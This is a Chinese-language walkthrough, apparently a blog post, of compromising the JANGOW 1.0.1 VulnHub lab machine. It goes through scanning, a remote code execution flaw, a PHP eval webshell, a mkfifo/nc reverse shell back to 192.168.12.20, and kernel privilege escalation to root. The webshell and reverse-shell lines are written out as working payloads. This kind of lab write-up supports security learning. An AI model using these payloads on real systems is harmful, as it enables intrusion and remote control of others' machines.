JANGOW靶机:1.0.1
如果主机发现发现不了ip地址请看这里:https://hackergu.com/vulnhub-ip/
使用arp-scan主机发现,以及nmap进行端口扫描
只有一个目录,我们可以去访问一下
这里我们发现了一个目录,我们可以去看一下
这里应该是可以传递一个参数,所以猜测这里应该存在一个远程代码执行
这里很明显存在远程代码执行漏洞
所以这里我们直接写入一个一句话,然后连接
echo '<?php @eval($_REQUEST['cmd']);phpinfo();?>' >> aaa.php
这里我们发现他的路径,我们可以直接访问
我们可以直接连接
这里成功拿下这个用户
在这里我们发现了用户名和密码,但是没有什么可以利用的东西,所以这里我们尝试着使用反弹shell
但是这里并没有-e参数
这里也弹不了,所以我们需要换一种shell,nc不行,我们可以使用别的
在这里我们可以直接写一个php的webshell,然后将其传入,之后反弹shell连接。
<?php system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.12.20 443>/tmp/f');?>
这里成功弹上来
接着我们就可以提权了!
这里我们发现了版本号是16.04,我们可以去漏洞库找一下
这里我们使用这个提权,我们将其传入的系统中,我们可以使用蚁剑传入
成功找到,所以我们可以使用 gcc编译
这里就成功编译,出现一个a.out的文件
我们只需要将其执行即可
这里成功拿下root权限
成功拿下
2686
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
